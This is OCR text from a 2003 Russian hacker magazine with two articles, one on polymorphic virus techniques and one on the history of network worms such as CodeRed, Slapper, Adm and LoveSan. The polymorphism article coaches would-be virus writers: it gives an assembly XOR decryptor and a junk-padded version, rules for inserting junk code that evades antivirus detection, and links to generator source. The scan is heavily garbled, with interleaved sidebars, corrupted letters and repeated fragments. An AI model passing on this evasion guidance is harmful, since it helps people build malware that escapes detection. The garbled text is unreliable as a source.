детектирования, помогает запутать 
собственный код. Но зараза может 
быть засечена с помощью предвари- 
тельного отсеивания мусора антиви- 
русом. Вирусы Tequila, StarShip, V2Px, 
DrWhite принадлежат к третьему 
уровню полиморфизма. 


Уровень 4. Использование взаимоза- 
меняемых инструкций с перемешива- 
нием в коде, без дополнительного U3- 
менения алгоритма расшифровки, по- 
могает полностью запутать антиви- 


рус. При этом невозможно "поймать" 
вирус по стандартной маске. Прихо- 
дится выполнять перебор, после кото- 
рого нужная сигнатура будет найдена. 
Так были написаны вирусы Uruguay, 
CLME, APE. 


Уровень 5. Реализация всех вышеиз- 
ложенных уровней с поддержкой 
различных алгоритмов в расшифров- 
щике помогает достичь высокого 
уровня полиморфизма. При этом мо- 
жет существовать несколько парал- 
лельных процессов расшифровки, 
когда один будет преобразовывать 
код другого или наоборот. Распозна- 
вание таких вирусов - очень сложный 
процесс. Для этого необходимо про- 
извести тщательный анализ кода са- 
мого расшифровщика. С лечением 
сложнее - приходится трассировать 
не только генератор, но и тело самого 
вируса для выявления полной ин- 
срормации о зараженном срайле. Эта 
процедура занимает довольно про- 
должительное время и может закон- 
читься неудачно. Лечить вирусы это- 
го уровня может лишь DrWeb, в ос- 
тальных программах это попросту не 
реализовано. К представителям уров- 
ня относятся DAME и gp. 


Два файла, зараженные одним и тем же 
вирусом, всегда будут иметь разный 
размер. Как ты понимаешь, задетектить 
такую заразу очень сложно 


ЧТО ПОЧИТАТЬ? 


Ш Этот материал поможет тебе разобраться в азах полиморфизма. 
За дополнительными сведениями обращайся к следующим источ- 


никам: 


ммм viruslist.com/viruslistbooks.html?id=12 - что такое полимор- 


физм и с чем его едят. 


http://zOmbie.host.sk/poly.html - статья про уровни полиморфи- 
ков, а также про способы детектирования. 
http://vx.netlux.org/lib/vglO1.html - хорошая статья про полимор- 


физм (на английском). 


http://vx.netlux.org/texts/htm!/i31t.html - пособие по написанию 
своего полиморфика (на английском). 
http://iomas.vsau.ru/uch-proz/el_izdan/internet/leture_virus.htm - 
история развития вирусов (в том числе и полиморфных). 


На сайте http://vx.netlux.org ты можешь 


скачать $оигсе-код известных 
генераторов 


Описание известных полиморфиков на 
www.viruslist.com 


Уровень 6 (неизлечимый). И, наконец, 
существуют вирусы, которые состоят 
из программных единиц-частей. Они 
постоянно меняются в теле и переме- 
щают свои подпрограммы. Лечение 
таких вирусов пока не производится, 
но и для написания нужно очень хо- 
рошо разбираться в ассемблере. Ха- 
рактерной особенностью такой зара- 
зы являются пятна. При этом в раз- 
личные места срайла записывается 
несколько блоков кода, что обуслав- 
ливает название метода. Такие пятна 
в целом образуют полиморерный рас- 
шифровщик, который работает с ко- 
дом в конце файла. Для реализации 
метода даже не нужно использовать 
команды-мусор - подобрать сигнатуру 
будет все равно невозможно. Такой 
алгоритм юзают вири BacBoy, 
CommanderBomber, Leech и т.п. 


НАПИСАЛ САМ - 
ПОМОГИ ДРУГОМУ! 

и Полиморфизм стал очень расп- 
ространенным лишь благодаря рас- 
шифровщику. Удобно то, что один 
файл может работать со многими ви- 


русами. Этим и пользуются вирмей- Вообще, по- 
у ы лиморфизм - 
керы, юзая чужой модуль. Подвод аКокОклас” 
ным камнем при таком раскладе мо- сная техни 
жет стать ситуация, когда в базе ан- ЕТ 
в ющая вирусу 
тивируса хранится используемый быть неза- 
расшифровщик. Если это случилось, меченным по 
стандартной 
все вирусы, подключенные к нему, сигнатуре 
будут детектиться. Согласись, непри- (или, попрос- 
У у В ту, маске). 
ятно, когда твой новый вирь обнару ОО 
живается как экземпляр из семей- текторы за- 
ства MtE вирусов 1992 года. разы опреде- 
ляют вирь 
по характер- 
ПРАКТИКА ным кускам 
и Любой может написать хороший НА 
полимореный вирус. Необходимо лиморфиком 
= такое не 
лишь немного разбираться в ассемб и. 


лере. На создание среднего полимор- 
фика тратится не более шести часов. 
Хочешь попробовать? Тогда послу- 
шай ряд рекомендаций по составле- 
нию алгоритмов твоего будущего ви- 
ря и расшифровщика. » 
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Грамотно написанный генератор 


Существуют 
вирусы, ко- 
торые состо- 
ят из програ- 
ммных еди- 
ниц-частей. 
Они постоян- 
но меняются 
в теле и пе- 
ремещают 
свои подп- 
рограммы. 
Лечение та- 
ких вирусов 
пока не про- 
изводится, 
но и для на- 
писания 
нужно очень 
хорошо раз- 
бираться в 
ассемблере. 


Любой мо- 
жет напи- 
сать хоро- 
ший полимо- 
рфный ви- 
рус. Необхо- 
димо лишь 
немного раз- 
бираться в 
ассемблере. 
На создание 
среднего по- 
лиморфика 
тратится не 
более шести 
часов. 


Теперь вир- 
мейкеру не 
нужно было 
писать свой 
дешифратор, 
а лишь вос- 
пользовать- 
ся MtE, в ре- 
зультате че- 
го мир узнал 
о новом се- 
мействе ви- 
русов. 


ТЕХНИКА ШИФРОВАНИЯ 


Очень проста реализация поиска 
зеркальных команд. Для этого не- 
обходимо создать сводную табли- 
цу с операндами. К ней должна 
прилагаться дополнительная ин- 
формация: наличие зеркала, необ- 
ходимость замены команды и про- 
чее. Если человек немного понима- 
ет в вирмейкинге и ассемблере, то 
составить подобную таблицу ему 
будет несложно. С командами-му- 
сором можно поступить аналогич- 
ным образом, как и с зеркалами. 
Кстати о мусоре. К таким инструк- 
циям прилагается ряд ограниче- 
ний, которые должен исполнять 
каждый вирусописатель, чтобы его 
творение работало как следует. 
Итак, команда не должна: 


@. Передавать управление за 
внешнюю программу. То есть уп- 
равлять кодом может лишь рас- 
шифровщик и никто другой. Если 
нарушить это правило - вирус бу- 
дет замечен. 

@. Изменять регистры, которые 
используют рабочие команды. Сам 
понимаешь, мусор есть мусор и он 
никоим образом не должен пересе- 
каться с правильным кодом. 

9. Вызывать фатальные ошибки, 
а также генерировать исключения, 
так как это остановит работу рас- 
шифровщика, либо сделает ее не- 
верной. 

Смысл всех правил сводится к OGHO- 
му - мусор не должен мешать про- 
цессу расшифровки кода, а лишь 
радовать глаз антивируса и неопыт- 
ного пользователя, трассирующего 
зараженный файл. 

Еще один полезный совет: ставь не- 
рабочую команду после цикла, но 
перед шифрованным кодом - это из- 
бавит от некоторых проблем с кон- 
вейером у процессоров Pentium. 

Ну, а теперь рассмотрим и вовсе 
конкретный пример. Пусть у нас 
есть самый что ни на есть элемен- 
тарный расшифровщик: 


mov ecx,virus_size 

lea 
edi,pointer_to_code_to_crypt 

mov eax,crypt_key 
_begin_loop: 

xor dword ptr [edi],eax 

add edi,4 

loop _begin_loop 


Теперь посмотрим, что же может 
сделать наш полиморфный движок 
с этим кодом (с учетом всего того, 
что я писал выше): 


shl eax,2 
add ebx,157637369h 
imul eax,ebx,69 
(*) mov ecx,virus_size 
гс! esi,1 
cli 
(*) lea 
edi,pointer_to_code_to_crypt 


ХАКЕРСПЕЦ | 10(35) | 2003 


gato GPB_Exit 


|| tired sa = “GPE Lit <6) ‘BAT? SEPO” Pats 
|| fined А“ СРВ. Lis <0 ВАТ» СРВ Files 
find A = GPB_LI3 240. BAT=>%GPH_ File’ 
tired, А" СРВ” ЕЕ] Г Рае % 
| fired A СРВ LIS" О ВАТ» СРВ | File% 

find fi GPE Lig" 50, BAT=>%GPB_ РЕ 
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Пример реализации генератора на... Bat-cxpuntax! 


ыы 


Подробный Help по использованию модулей Dizx 


Очень проста реализация поиска 
зеркальных KOMAHG. Для этого необходимо 
создать сводную таблицу с операндами 


xchg eax,esi 
(*) mov eax,crypt_key 
mov esi,22132546h 
and ebx,OFF242569h 
(*) xor dword ptr [edi],eax 
or eax,34548286h 
add esi, 76869678h 
(*) add edi,4 
stc 
push eax 
xor edx,24564631h 
pop esi 
(*) loop 00401013h 
cmc 
or edx,132h 


В этом коде звездочками отмечены 
исходные инструкции. Конечно, ан- 
тивируснику обнаружить такой код 
будет несложно, но гораздо слож- 
нее, чем обычный, незащищенный. 
Ты никогда не задумывался над 
тем, без чего не может обойтись ни 
один полиморфный движок? Ко- 
нечно! Он не может обойтись без 
генератора [псевдо]случайных чи- 
сел. Тут сама собой напрашивается 
любимая функция rand(), но в 
ASM'e ее нет, поэтому придется 
изобретать что-нибудь свое. Хоро- 


ПОМИМО ПОЛИМОРФИЗМА СУЩЕСТВУЮТ И ДРУГИЕ 


ТЕХНОЛОГИИ ШИФРОВАНИЯ. ВОТ НЕКОТОРЫЕ ИЗ НИХ: 


ИИ 
HLL 
И напоследок скажу - если будешь 


писать вирус, то делай это лишь 
в целях самообразования 


шим вариантом является исполь- 
зование следующего кода: 


Основная суть полиморфного 
движка состоит в том, чтобы гене- 
рировать код "на лету", "из ниче- 
го": мы можем записать код в ка- 
кую-то специально отведенную для 
этого область памяти, а затем выз- 
вать его. Примером тому может 
служить подобная реализация ко- 
да дешифровщика, который мы 
приводили выше: 


Несложно догадаться, что достаточ- 
но пары строчек кода, чтобы сде- 
лать этот код генератором полимо- 
рфного дешифровщика. Достаточ- 
но хотя бы добавить случайную 
вставку однобайтовых инструкций 
после каждого $105. 

Я думаю, на этом небольшом приме- 
ре можно понять, как работают по- 
лиморофные движки. Конечно, ре- 
ально они гораздо сложнее: они ис- 
пользуют различные регистры, пе- 
редвижение частей кода и т.п. - но 
это уже зависит от твоего вообра- 
жения и желания воплощать зло в 
ассемблерном коде :). 

Как я уже говорил, можно не изоб- 
ретать велосипед, а заюзать уже 
готовые расшифровщики. Для нео- 
пытного вирмейкера это единствен- 
ная возможность написать рабочий 
вирус, так как ему вряд ли удастся 
сделать свой рабочий модуль (это 
довольно сложно и под силу лишь 
спецу). Но с чужим расшифровщи- 
ком ты можешь столкнуться с ря- 
дом проблем, одна из которых уже 
была названа - антивирус ;). Вызов 
дешифратора находится, как прави- 
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Одним из 
опасных ви- 
русов был 
Predator, 
который пе- 
рехватывал 
прерывания 
13h и 211 и 
записывал 
себя в конец 
всех COM- 
файлов. Ис- 
пользуя int 
13h, вирь 
проверял 
сектора, 
считывае- 
мые с дис- 
ков, и изме- 
HAN в них 
один бит в 
определен- 
ное время. 


Существуют 
вирусы, ко- 
торые состо- 
ят из програ- 
ммных еди- 
ниц-частей. 
Они постоян- 


но меняются 
в теле и пе- 
ремещают 
свои подп- 
рограммы. 
Лечение та- 
ких вирусов 
пока не про- 
изводится, 
но и для на- 
писания 
нужно очень 
хорошо раз- 
бираться в 
ассемблере. 


ТЕХНИКА ШИФРОВАНИЯ 


ло, в рабочем регистре, узнать ко- 
торый ты сможешь, прочитав ману- 
ал по данному модулю. 

И напоследок скажу - если будешь 
писать вирус, то делай это лишь в 
целях самообразования. Используя 
чужой дешифратор кода, хороший 
полиморф ты все равно не напи- 
шешь. Поэтому запускать вирь на 
чужих беззащитных машинах будет 
просто глупо. 


ИСКУССТВЕННЫЙ ИНТЕЛЛЕКТ 

m= В полиморфы нередко встраива- 
ют код, который выполняется в за- 
висимости от определенной ситуа- 
ции. Например, при детектировании 
вируса он может вызвать процеду- 
ру самоуничтожения. Как самого се- 
бя (частичная или полная безвозв- 
ратная модификация кода), так и 
системы (массовое заражение сис- 
темных файлов без возможности 
восстановления). Это очень ослож- 


Особенностью вируса является то, 


что он проверяет носитель 
на возможность записи 


няет поиск лекарства от заразы - gO 
антивирусной лаборатории вирус 
доходит уже в нерабочем состоя- 
нии. Также были случаи вызова 
исключающего кода при попытке 
излечения виря (на высоком уровне 
полиморфизма). 

Вирусописатели прежде всего ак- 
центируют внимание на трех глав- 
ных вещах в своем творении: 


©. Маскировка. Цель каждого по- 
лимороника - как можно дольше 
продержаться в системе до детекти- 
ровании антивирусом. 

©. Защита. После обнаружения 
заразы происходит вызов исключа- 
ющего кода. Об этом было написано 
выше. 

©. Сложность. Код вируса должен 
быть очень запутанным, содержать 
в себе инструкции-зеркала, коман- 
ды-мусор и прочее. Это обычно ра- 
ботает против новичка, но профес- 
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SMEG 


сионал в течение нескольких часов 
изучения кода при трассировке, 
проследцит за алгоритмом заразы. 


МАССОВЫЕ ЗАРАЖЕНИЯ 

ш Теперь, когда мы знаем прин- 
цип полиморфиков, обратимся к 
истории. Первый такой вирь поя- 
вился в 1990 году и назывался 
Chameleon. Он вписывал свой код 
в конец СОМ-файлов, а также ис- 
пользовал два алгоритма шифро- 
вания. Первый шифрует тело по 
таймеру в зависимости от значе- 
ния заданного ключа. Второй ис- 
пользует динамическое шифрова- 
ние и при этом активно мешает 
трассировке виря. Существовала и 
модификация Chameleon. Вторая 
версия 1 апреля форматировала 
диск А: (учитывая объемы того вре- 
мени, это было весьма неприятно). 
После этого эволюция полиморфов 
завершилась. Только через три го- 
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ga вышел вирус Phantomi, который 
добрался и до русских компьюте- 
ров. Он не был опасен, хотя содер- 
жал в коде ряд ошибок, из-за кото- 
рых генератор не мог расшифро- 
вать тело вируса. При этом испол- 
няемый файл переставал функцио- 
нировать. После длительного прос- 
тоя системы фантом выводил на эк- 
ран видеоизображение с надписью. 
Она гласила, что компьютер нахо- 
дится под наблюдением опасного 
вируса. 

Параллельно вирусам появлялись и 
полиморфик-генераторы, одним из 
которым был MtE, открывший целое 
заразное семейство. Он уже ис- 
пользовал зеркальные функции, 
чем затруднял свое детектирова- 
ние. Теперь вирмейкеру не нужно 
было писать свой дешифратор, а 
лишь воспользоваться М\Е, в ре- 
зультате чего мир узнал о новом 
семействе вирусов. Что интересно, 
первый MtE-Bupyc был перехвачен 
антивирусной лабораторией, поэто- 
му быстрый выход защиты от пер- 
вого серьезного полиморфика за- 
щитил множество рабочих станций 
от заразы. 

На 1993 год пришлось очень много 
полиморфных вирусов. При этом 
программисты, видимо, соревнова- 
лись между собой и решали, чья за- 
раза окажется круче всех. Появля- 
лись все новые дешифраторы, KOTO- 
рые юзались другими вирмейкерами 
для своих грязных целей. Одним из 
таких опасных вирусов был 
Predator, который перехватывал 
прерывания 13h и 211 и записывал 
себя в конец всех СОМ-файлов. Ис- 
пользуя int 13h, вирь проверял сек- 
тора, считываемые с дисков, и изме- 
нял в них один бит в определенное 
время. 

Другое семейство вирусов Daemaen 
записывает себя в COM, EXE и SYS- 
файлы. При этом бинарники, начи- 
нающиеся Ha SC, VF и F-, не заража- 


ются. С виду эти вирусы выглядят 
вполне безопасно, но на самом деле 
происходит запись в МВК винчесте- 
pa ив Боо{-сектора дискет, а тело 
заразы хранится в последних секто- 
рах. Вирь содержит в себе ряд оши- 
бок, которые вполне могут разру- 
шить FAT. 

Вирмейкеры обычно оставляют вмес- 
те с вирусом какую-либо информа- 
цию. Так, например, полиморфик 
Invisible записывается в конец испол- 
няемых файлов. В зависимости от 
времени зараза заменяет срайл дру- 
гой программой, при запуске которой 
юзер слышит музыку и видит перед 
собой текст песни I'm the invisible 
пап (хит тех времен). Еще один при- 
мер - вирус Seat. После заражения 
вирь перехватывает 211, записывает 
себя в исполняемые файлы. Затем 
наступает самое интересное. Время 
от времени на экране компьютера по- 
является голая задница, а при нажа- 
тии на клавиши раздаются характер- 
ные для изображения звуки ;). 

В это же время группа программис- 
тов из болгарской школы (там всег- 
да писались грамотные вири) созда- 
ет полимороик Todor. Он не исполь- 
зовал высококлассных алгоритмов. 
Его изящность заключалась в том, 


время поиска). К тому же, 15 числа 
каждого месяца, вирь случайным об- 
разом шифрует сектор жесткого дис- 
ка. Это делает полиморфика доволь- 
но опасным, так как сектором может 
являться и Root Directory. 

Не обошлось и без ошибок. Todor 
некорректно проверяет длину фай- 
ла. Точнее, если она будет более 64 
Кб, заразить файл не удастся, а 
компьютер зависнет. Вторая ошибка 
заключается в том, что в теле рас- 
шифровщика содержится лишняя 
команда РОР. Файл, в который она 
попадет, неминуемо повиснет после 
запуска. И напоследок, заражая би- 
нарник, вирус сначала изменяет за- 
головок файла, а затем записывает 
себя в его конец. При ошибке запи- 
си либо переполнении носителя ис- 
полняемый файл будет испорчен, и 
восстановить его уже не удастся. 
После выхода Тодора мир узнал о 
новом полиморфик-генераторе ТРЕ 
(Trident Polymorphic Engine), кото- 
рый распространялся в архивах BBS 
с подробным кодом и документацией 
по использованию. Благодаря этому, 
стали появляться вирусы (семей- 
ство ТРЕ), юзающие этот модуль. 

К концу 1993 года генераторов ста- 
ло выпускаться очень много. Анти- 


Затем наступает самое интересное. Время 
от времени на экране компьютера 
появляется голая задница, а при нажатии 
на клавиши раздаются характерные для 
изображения звуки ;). 


что зараза разрабатывалась по но- 
вой технологии. Вес вируса состав- 
лял ровно 1993 байта, что соответ- 
ствовало году выпуска. 

При запуске Тодора происходит рас- 
шифровка его тела. Для этого юза- 
ется довольно простой алгоритм, ос- 
нованный на ХОБ. С каждым шагом 
слово вируса ХОБ'ится с непостоян- 
ным ключом. После активации пе- 
рехватывается адрес 24h и происхо- 
дит заражение файла command.com. 
В довершение вирус поражает 5 
файлов с расширением СОМ или 
ЕХЕ. 

Особенностью вируса является то, 
что он проверяет носитель на воз- 
можность записи. Перед заражением 
каждого бинарника создается вре- 
менный сфайл (затем удаляется). Ког- 
да это невозможно (адрес 24h нужен 
для возврата именно таких ошибок), 
зараза прекращает свою деятель- 
ность, считая, что носитель защищен 
от записи. Атрибуты и дата файла 
после заражения становятся прежни- 
ми. Лишь значение секунд становит- 
ся равным 22. Это сделано для того, 
чтобы не инфицировать бинарник 
повторно (вирус проверяет дату во 
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вирусы He справлялись с таким по- 
током, это также обуславливалось 
улучшением технологии полимор- 
физма. 

Рассмотрим примеры. Дешифратор 
SPE позволял записывать код ви- 
руса в исполняемые файлы и орга- 
низовывал специальный счетчик. 
При его определенных значениях, 
вирь стирал содержимое МВК вин- 
честера и перезагружал компью- 
тер. Некоторые генераторы реаги- 
ровали на команды, введенные 
пользователем. Например, VICE за- 
ражал файлы в каталоге лишь тог- 
да, когда пользователь в него вхо- 
gun. Также дешифратор умел yga- 
лять базы антивируса. 

Генератор SMEG был очень опа- 
сен. Этот расшифровщик умел 
вписывать свой код в исполняе- 
мые файлы, а также стирать 
CMOS и сектора дисков. Процесс 
происходил каждый понедельник. 
После экзекуции вирус показывал 
надпись, сообщающую, что жест- 
кий диск был поврежден. 


А ЧТО ТЕПЕРЬ? 

m= В наше время многие вирусы 
используют полиморфизм высоких 
уровней в своих алгоритмах. Но 
развития технологии практически 
не наблюдается, можно сказать, 
что она уже изжила себя. Помимо 
полиморфизма существуют и дру- 
гие методы маскировки, например, 
стелс-технологии. Возможно, скоро 
вирусописатели придумают мощ- 
ный алгоритм защиты своих творе- 
ний, который не сможет разгадать 
ни один продвинутый антивирус... 
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Любой мо- 
жет напи- 
сать хоро- 
ший полимо- 
рфный ви- 
рус. Необхо- 
димо лишь 
немного раз- 
бираться в 
ассемблере. 
На создание 
среднего по- 
лиморфика 
тратится не 
более шести 


часов. 


Теперь вир- 
мейкеру не 
нужно было 
писать свой 
дешифратор, 
а лишь вос- 
пользовать- 
ся МЕ, в ре- 
зультате че- 
го мир узнал 
о новом се- 
мействе ви- 
русов. 


Дешифра- 
тор SPE 
позволял за- 
писывать 
код вируса в 
исполняе- 
мые файлы 
и организо- 
вывал спе- 
циальный 
счетчик. 
При его оп- 
ределенных 
значениях 
вирь стирал 
содержимое 
MBR вин- 
честера и 
перезагру- 
жал компь- 
ютер. 


ПОДВИЖНЫЕ ВИРУСЫ: МИЯ 


РИЛИ РЕАЛЬНОСТЬ? | 


Докучаев Дмитрий aka Forb (forb@real.xakep.ru) 


ПОДВИЖНЫЕ ВИРУСЫ: 
МИФ ИЛИ РЕАЛЬНОСТЬ? 


РОЖДЕНИЕ ЗАРАЗЫ 


ш Черви появляются 


несколько позже вы- 


Самым на- 
шумевшим 
вирусом, ко- 
торый про- 
никал в сис- 
тему через 
IS, был из- 
вестный 
CodeRed. По 
подсчетам, 
он заразил 
порядка две- 
надцати ты- 
сяч серверов 
по всему ми- 
ру. Изна- 
чально червь 
был ориен- 
тирован на 
глобальный 
DDoS против 
сайта Белого 
дома 
www.white- 
house.gov. 


Линуксовый 
Adm юзает 
переполне- 
ние буфера в 
BIND, запи- 
сывая себя 
на удален- 
ную машину. 
При этом он 
передает 
лишь часть 
своего кода, 
который ав- 
томатически 
компилиру- 
ется и дока- 
чивает ос- 
тальные 
компоненты 
уже с зара- 
женной ма- 
шины. 


хода эксплоита на оп- 

ределенную уязви- 
мость в системе. Это происходит в тот 
промежуток времени, когда бага еще 
не потеряла актуальности, а пользо- 
ватель своевременно не пропатчил 
систему. Проникая на территорию 
врага, вирус осваивается в системе, а 
затем начинает сканить инет и ло- 
миться на другие машины (хотя это 
не всегда так). 

Как известно, операционки не иде- 
альны. Багов обнаруживают очень 
много, поэтому время от времени мир 
узнает о новом червяке. Но учиты- 
вая, что бреши в осях в основном No- 
кальные (для червяка приемлем 
лишь удаленный метод проникнове- 
ния), экземпляров данного типа виру- 
сов очень мало. 

Цели червей, как я уже сказал, мо- 
гут быть разными. Одни поражают 
операционную систему и пытаются 
пролезть через нее на другие маши- 
ны, другие просто ведут паразитичес- 
кий образ жизни, накручивая банне- 
ры на сайте, третьи творят глобаль- 
ный 0005 в определенное время... 
После моей подробной классифика- 
ции ползучей заразы ты поймешь, 
что червяки - очень опасные вирусы, 
которые при желании могут парали- 
зовать весь интернет. 


ПОЛЗЕМ ЧЕРЕЗ WEB 

m Уязвимости в Web с каждым го- 
дом обнаруживают все чаще и чаще. 
Начиная с самой популярной unicode- 
баги в IIS под винду, заканчивая 
ошибкой в модуле mod_php и moc_ssl 
nog Linux. Взломщики пользуются 
этими багами в целях подчинения 
системы, вирусописатели же создают 
червяков, которые вламываются на 
машину и пытаются заразить боль- 
шое количество серверов. 


Самым нашумевшим вирусом, кото- 
рый проникал в систему через IIS, 
был известный CodeRed. По подсче- 
там, он заразил порядка двенадцати 
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ТЕХНОЛОГИИ РАСПРОСТРАНЕНИЯ ЧЕРВЕЙ 
В ИНЕТЕ НА КОНКРЕТНЫХ ПРИМЕРАХ 
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рис. Константин Комардин 


тысяч серверов по всему миру. Изна- 
чально червь был ориентирован на 
глобальный DDoS против сайта Бело- 
го дома www.whitehouse.gov. Атака 
была выполнена успешно, нормаль- 
ная работа сервера нарушилась. По- 
мимо DDOS'a Белого дома, червяк пе- 


Сервер, зараженный червяком CodeRed 


рехватывал все запросы на Web-cep- 
вер и показывал уже свою страницу, 
вводя в заблуждение посетителей. 


Как же действовал CodeRed? Ис- 
пользуя известную unicode-Gary, он 
проникал в систему и уже оттуда ис- 
кал новые П5-сервера. Если ты пом- 
нишь, ошибка была обнаружена в 
июне 2001 года. Буквально через 
несколько дней мелгомягкие выпус- 
тили патч, но мало кто своевременно 
скачал и установил его. 


Масштаб заражения CodeRed'om 
мог быть больше в десятки раз, если 
бы он ориентировался на другие 
платформы Windows. Червяк зара- 
жал лишь системы с Win2k. Видимо, 
это было сделано умышленно. 


Уникальность CodeRed была в том, 
что вирус не использовал никаких 
временных и постоянных файлов в 
своей работе. Червь переползал в 
систему в виде ТСРЛР пакета, затем 
селился в оперативке машины и ис- 
кал новые жертвы. При этом опреде- 
лить заразу было весьма проблема- 
тично, так как только специальные 
антивирусные модули для межсете- 
вых экранов могли это сделать. 


при запуске соединялась с IRC-cepBe- 
ром и могла выполнять команды от 
хозяина. Помимо ОВо5'а различными 
способами, червь успешно распрост- 
ранялся на другие linux-cepBepa и за- 
разил в общей сложности 1600 ма- 
шин по всему миру. 

Чуть раньше Mighty, мир узнал о 
линуксовом червячке Slapper (кстати, 
часть его кода была позаимствована 
вышеописанным вирем). Я лично 


Используя уникальный алгоритм поиска 
систем, червяк распространился 
на огромное количество компьютеров. 


Через несколько недель появи- 
лась модификация CodeRed, напи- 
санная более грамотными людьми. 
Используя уникальный алгоритм по- 
иска систем, червяк распространил- 
ся на огромное количество компью- 
теров. Правда, DDOS в планы второй 
версии заразы не входил. На этот 
раз CodeRed поставлялся с бэкдо- 
ром, что давало возможность уда- 
ленно управлять зараженной систе- 
мой. Червь вписывался в реестр и 
активировался при каждом запуске 
компьютера. 


Существовали и другие червяки, 
ориентированные Ha И5-уязвимость. 
Известный IISWorm, например, прони- 
кая в систему, ищет адреса других 
серверов в... html-ctpaHvuax веб-сер- 
вера. После проделанной работы ви- 
рус поражает программное обеспече- 
ние на машине. Имя файла-червя 
всегда постоянно - jisworm.exe. 


LINUX НЕ ИСКЛЮЧЕНИЕ 

m Если ты думаешь, что червяки вы- 
пускаются только под винду - ты 
ошибаешься. Как я уже говорил, в 
Linux было обнаружено много уязви- 
мостей в модулях Apache. Один из ви- 
рей, использовавший багу в Moc_ssl 
получил название Mighty. Эта зараза 


сталкивался с этим вирусом. Зараза 
проникает на машину в UUENCODE- 
виде, затем записывает себя в 
/tmp/.bugtrag.c. После компиляции и 
запуска червь сканит инет на пред- 
мет баги в OpenSSL (происходит пе- 
ребор по всем таргетам Slapper'a), а 
также следит за приходящими датаг- 
раммами на 2002 УОР-порт. Через 
бэкдор можно выполнить огромное 
количество команд, как, например: 


Ф. Запустить локальный файл. 

©. Совершить DoS-ataky различны- 
ми методами (TCP, UDP, DNS или RAW 
пакетами). 

@. Отослать электронное письмо. 

@. Загрузить бинарный файл по 
протоколу НТТР и выполнить его. 


Кроме того, все команды, которые 
передаются через UDP, зашифрова- 
ны, что защищает от прослушивания 
пакетов. 
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Как это ни 
парадок- 
сально, су- 
ществуют 
червяки, ко- 
торые... ле- 
чат компью- 
теры от дру- 
гих червей. 
Видимо, у 
некоторых 
вирмейке- 
ров-энтузи- 
астов воз- 
никло жела- 
ние очистить 
глобал от 
грязи. Такие 
экземпляры 
также были 
признаны 
вирусами, 
хоть они и 
не приносят 
вреда. 


Вирусописа- 
тель 
LoveSan был 
явно обижен 
Ha Microsoft, 
потому что 
зараза про- 
веряла сис- 
темное вре- 
мя, и после 
15 августа 
вирь начи- 
нал флудить 
НТТР-запро- 
сами сервер 
www.window- 
supdate.com. 


Проникая на 
территорию 
врага, вирус 
осваивается 
в системе, а 
затем начи- 
нает сканить 
инет и ло- 
миться на 
другие ма- 
шины. 


NO 


ВИЖНЫЕ ВИРУСЫ: МИЯ 


DVI РЕАЛЬНОСТЬ? | 


Автор вируса преследовал цель 
создать полностью связную сеть для 
атак, так как зараза умела переда- 
вать команды и на другие заражен- 
ные им машины. 


ДРУГИЕ УЯЗВИМОСТИ 

ш Помимо Web, существуют другие 
уязвимости, которые используют 
многие вирусы. К примеру, линуксо- 
вый Adm юзает переполнение 6ycpe- 
ра в BIND, записывая себя Ha удален- 
ную машину. При этом он передает 
лишь часть своего кода, который ав- 
томатически компилируется и дока- 
чивает остальные компоненты уже с 
зараженной машины. 


Червяк состоит из восьми компо- 
нент, пять из которых являются 
shell-ckpuntamy, а три - бинарными 
файлами. Поочередно запуская 
файлы, зараза инфицирует машины 
в Сети. После этого скачивает себя с 
ЕТР-сайта в виде архива, распаковы- 
вает его, и процесс продолжается по 
новой. 


Последствия Adm очень нехоро- 
шие. Червяк находит все сфайлы 
index.html и вписывает туда постоян- 
ный текст "The ADM Inet wOrm is here 


|". После чего удаляет файл 
/etc/hosts.deny и отправляет письмо 
с |Р-адресом зараженной машины на 
адрес электронной почты 
admsmb@hotmail.com. 


The ADM inet wim w bere | 


Adm на Linux-cepsBepe 


Совсем недавно была обнаружена 
ВРС-уязвимость на всех МТ-платфор- 
мах, которая позволяла открывать 
шелл с правами администратора. В 
конце июля (через пару дней после 
выхода сводки в bugtraq) майкрососр- 
товцы испекли патч, закрывающий 
брешь. Но, как известно, мало кто ус- 
тановил его на свою систему (от баги 
RPC не помогали даже сервиспаки). 

А через месяц случилось самое ин- 
тересное - по инету был пущен червь 


Патч от MicroSoft вышел сразу после 
обнаружения бреши 


10435) [2003 


LoveSan, который имел размер всего 
6 Кб. Вирь проникал в систему под 
именем msblast.exe и содержал в се- 
бе следующие строки: 


| just want to say LOVE YOU SAN!! 

billy gates why do you make this pos- 
sible ? 

Stop making money and fix your soft- 
warel!! 

Симптомом заражения являлось Ha- 
личие файла msbiast.exe в каталоге 
Windows, а также частые перезагруз- 
ки компьютера из-за сбоя в RPC-cep- 
висе. Ориентирован LoveSan был Ha 
Win2k/XP, другие системы им не ин- 
фицировались. 


Вирусописатель был явно обижен 
Ha Microsoft, потому что зараза про- 
веряла системное время, и после 15 
августа вирь начинал флудить НТТР- 
запросами сервер www.windowsup- 
date.com. Об этом стало известно 
еще 13 числа, и Майкрососрт готовил- 
ся к масштабной атаке (на тот момент 
было зафиксировано около 12 тысяч 
зараженных компьютеров). К вечеру 
15 августа хост 
www.windowsupdate.com перестал pe- 
золвиться в IP-agpec. Это было cge- 
лано специально, чтобы воспрепят- 
ствовать глобальному DDoS. Послед- 
ствия атаки до сих пор не афиширу- 
ЮТСЯ. 


LoveSan записывается в системный 
реестр, поэтому после перезагрузки 
компьютера запускается вновь. Ес- 
ли установить патч, но не удалить 
червяка - особой пользы это не при- 
несет, зараза все равно будет зара- 
жать новые сервера, используя 
твой компьютер. Сейчас уже выпу- 
щены специальные программы, ко- 
торые позволяют детектировать и 
уничтожать LoveSan на рабочей 
станции. Советую проверить свою 
машину на наличие файла mblast - 
возможно, ты тоже находишься в 


списке уязвимых. 


ЕЙ 


Машина с вирем LoveSan 


Особый вид представляют собой 
червячки, заражающие систему че- 
рез СУБД (системы управления ба- 
зами данных). Ярким примером такой 
заразы является Spida. Этот экземп- 
nap долбится на службу MsSql с де- 
сролтовым паролем "за". При удач- 
ном коннекте, вирус создает в систе- 
ме новую учетную запись sqla- 


gentcmdexec со случайным паролем, 
добавляя ее в группу Administrators. 
Далее копия Spida заливается в сис- 
темный каталог винды, а уязвимость, 
через которую вирь проник в систе- 
му, успешно закрывается. Из побоч- 
ных эффектов зафиксировано то, 
что червяк пытается отослать все 
учетные записи и базы данных на 
три e-mail адреса. 


ВС-ЧЕРВИ 

и Особую категорию составляют 
червяки, которые передаются через 
Internet Real Chat. Этот вид заразы 
не использует уязвимости в системе, 
а активируется лишь после того, как 
юзер выполнит определенную IRC- 
команду. Распространяется вирь так- 
